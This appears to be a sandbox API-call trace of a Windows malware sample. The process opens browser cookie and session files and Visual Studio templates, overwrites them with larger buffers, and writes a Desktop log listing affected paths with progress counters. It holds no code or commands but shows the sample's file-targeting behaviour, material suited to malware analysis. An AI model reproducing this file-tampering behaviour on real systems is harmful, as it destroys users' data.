WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=21 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0240.697] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=21 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=21 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0240.697] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0240.698] Sleep (dwMilliseconds=0x5dc) [0242.347] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=21 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0242.347] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=21 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=21 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0242.347] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0242.348] Sleep (dwMilliseconds=0x5dc) [0244.045] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=21 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0244.045] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=21 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=21 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0244.045] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0244.046] Sleep (dwMilliseconds=0x5dc) [0245.769] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0245.772] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\nATO_OPER: C:\\Program Files (x86)\\Adobe\\accupos.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\n", cchWideChar=1419, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1419 [0245.772] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\nATO_OPER: C:\\Program Files (x86)\\Adobe\\accupos.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\n", cchWideChar=1419, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1419 [0245.772] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\nATO_OPER: C:\\Program Files (x86)\\Adobe\\accupos.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\n", cchWideChar=1419, lpMultiByteStr=0x1eff4b8, cbMultiByte=1419, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\nATO_OPER: C:\\Program Files (x86)\\Adobe\\accupos.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\n", lpUsedDefaultChar=0x0) returned 1419 [0245.772] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x58b, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2a1fe34*=0x58b, lpOverlapped=0x0) returned 1 [0245.774] CloseHandle (hObject=0x1d4) returned 1 [0245.775] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=22 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0245.775] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=22 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=22 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0245.775] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0245.776] Sleep (dwMilliseconds=0x5dc) [0248.051] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=22 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0248.051] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=22 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=22 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0248.051] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0248.052] Sleep (dwMilliseconds=0x5dc) [0254.316] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=22 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0254.316] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=22 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=22 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0254.317] WriteFile (hFile=0x7, lpBuffer=0x4e8594, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0) Thread: id = 12 os_tid = 0x86c [0060.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.236] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.236] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4000 [0060.237] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.237] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.237] ReleaseMutex (hMutex=0x168) returned 1 [0060.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="previews_opt_out.db", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0060.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="previews_opt_out.db", cchWideChar=19, lpMultiByteStr=0x1f88d34, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="previews_opt_out.db", lpUsedDefaultChar=0x0) returned 19 [0060.237] ReadFile (in: hFile=0x1ac, lpBuffer=0x26afba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x26afba8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.239] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3000 [0060.240] ReadFile (in: hFile=0x1ac, lpBuffer=0x26afba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x26afba8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.240] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3000 [0060.241] WriteFile (in: hFile=0x1ac, lpBuffer=0x26afba8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26afba8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.241] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0060.241] WriteFile (in: hFile=0x1ac, lpBuffer=0x26b4c38*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4c38*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0060.241] CloseHandle (hObject=0x1ac) returned 1 [0060.242] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.244] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.244] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x80000 [0060.245] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.245] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.245] ReleaseMutex (hMutex=0x168) returned 1 [0060.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cookies.sqlite", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0060.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cookies.sqlite", cchWideChar=14, lpMultiByteStr=0x1f7340c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cookies.sqlite", lpUsedDefaultChar=0x0) returned 14 [0060.245] ReadFile (in: hFile=0x1ac, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0060.251] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7f000 [0060.251] ReadFile (in: hFile=0x1ac, lpBuffer=0x1e98048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e98048*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.253] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7f000 [0060.253] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec1308*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1308*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.270] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0060.270] WriteFile (in: hFile=0x1ac, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0060.270] CloseHandle (hObject=0x1ac) returned 1 [0060.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.279] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.280] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3d6 [0060.280] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.280] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.280] ReleaseMutex (hMutex=0x168) returned 1 [0060.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sessionstore.bak", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0060.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sessionstore.bak", cchWideChar=16, lpMultiByteStr=0x1f88d34, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sessionstore.bak", lpUsedDefaultChar=0x0) returned 16 [0060.280] ReadFile (in: hFile=0x1ac, lpBuffer=0x26afbc8, nNumberOfBytesToRead=0x3d6, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26afbc8*, lpNumberOfBytesRead=0x2b1f2bc*=0x3d6, lpOverlapped=0x0) returned 1 [0060.287] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0060.287] WriteFile (in: hFile=0x1ac, lpBuffer=0x1e90038*, nNumberOfBytesToWrite=0x95e, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90038*, lpNumberOfBytesWritten=0x2b1f2d0*=0x95e, lpOverlapped=0x0) returned 1 [0060.288] CloseHandle (hObject=0x1ac) returned 1 [0060.289] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\codefile.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.291] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.291] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x222 [0060.291] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.291] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.292] ReleaseMutex (hMutex=0x168) returned 1 [0060.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CodeFile.zip", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0060.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CodeFile.zip", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CodeFile.zip", lpUsedDefaultChar=0x0) returned 12 [0060.292] ReadFile (in: hFile=0x1ac, lpBuffer=0x1f257f8, nNumberOfBytesToRead=0x222, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f257f8*, lpNumberOfBytesRead=0x2b1f2bc*=0x222, lpOverlapped=0x0) returned 1 [0060.293] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0060.293] WriteFile (in: hFile=0x1ac, lpBuffer=0x2662a28*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7aa, lpOverlapped=0x0) returned 1 [0060.294] CloseHandle (hObject=0x1ac) returned 1 [0060.296] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settings.zip"), 